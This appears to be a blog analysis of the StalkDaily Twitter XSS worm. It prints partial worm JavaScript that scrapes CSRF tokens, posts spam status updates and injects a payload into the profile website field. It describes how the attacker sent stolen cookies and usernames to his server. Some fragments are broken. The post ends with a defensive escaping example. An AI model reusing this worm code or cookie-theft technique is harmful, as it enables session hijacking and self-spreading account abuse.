Can I see a little code? Sure! Here’s the initial vector being injected into the user’s website field.
- XHConn - Responsible for making XMLHttpRequests to the Twitter REST services
- urlencode - Provides a modified URL-encoding scheme
In addition to the support functions, the real action happens in the function called "wait". "wait" is responsible for constructing two separate XHR requests, one to post a status update and another to change the user's website URL in their profile. Here it is in all its glory (the `[n]` array indices were dropped from this page's copy and are restored from context; the snippet is cut off on the page at the `xss` assignment):

```javascript
var content = document.documentElement.innerHTML;
// Scrape the form authenticity (CSRF) token straight out of the page's own HTML,
// so the token offers no protection once script runs in the page
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
// Pool of status updates; one is chosen at random for each victim
var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
updateEncode = urlencode(genRand);
// New value for the profile website field: the URL followed by the injected payload (cut off here on the page)
var xss = urlencode('http://www.stalkdaily.com">
```
In order to use Twitter's REST API, don't you need a username? Check out the snippet below (the regular expression and the `document.write` payload did not survive on this page; only these fragments remain):

```javascript
var content = document.documentElement.innerHTML;
userreg = new RegExp(/"); document.write("");
```
In this section, located outside of the previous functions, the attacker logs the user's cookie information and username. Twitter places the user's username in the metadata at the top of the page, hence the "meta content=..." regex. With that information, the attacker can execute requests at will against Twitter's REST API by mimicking the user's current session. Note that the attacker logged the information to his server, meaning he could use it outside a browser environment whenever he wants (for as long as the user's session is valid).
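The worm got in because the profile website field was echoed into the page without encoding. As an added example (not code from this post, from Twitter, or from the worm), here is that bug class reproduced in a small renderer beside a hardened one; the function names `renderWebsiteUnsafe`, `escapeHtml`, `normalizeWebsite` and `renderWebsiteSafe` are assumed, the inputs are constructed, and the global `URL` class (Node or browser) is assumed to be available.

```javascript
// Added example, not from the original post: the profile "website" field
// rendered unsafely (the bug class the worm abused) beside a hardened renderer.

// Unsafe: the stored value is dropped straight into an href attribute, so a
// value containing `">` closes the tag and whatever follows becomes markup.
function renderWebsiteUnsafe(value) {
  return `<a class="website" href="${value}">${value}</a>`;
}

// Encode the characters that can break out of an HTML attribute or text node.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only absolute http(s) URLs (rejects javascript: and data: links).
// Returns the normalised href, or null when the value is unusable.
function normalizeWebsite(value) {
  let url;
  try {
    url = new URL(String(value).trim());
  } catch {
    return null;
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// Hardened: validate first, then encode for the context the value lands in.
// A rejected value renders as a fixed placeholder, never as markup.
function renderWebsiteSafe(value) {
  const href = normalizeWebsite(value);
  if (href === null) return '<span class="website">none</span>';
  const safe = escapeHtml(href);
  return `<a class="website" href="${safe}">${safe}</a>`;
}
```

Output encoding is what closes the hole; the scheme check on top of it keeps a well-formed but hostile link (`javascript:` and the like) from becoming a clickable profile URL.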
Did I miss something, or get it completely wrong? Let me know. Hope this was helpful.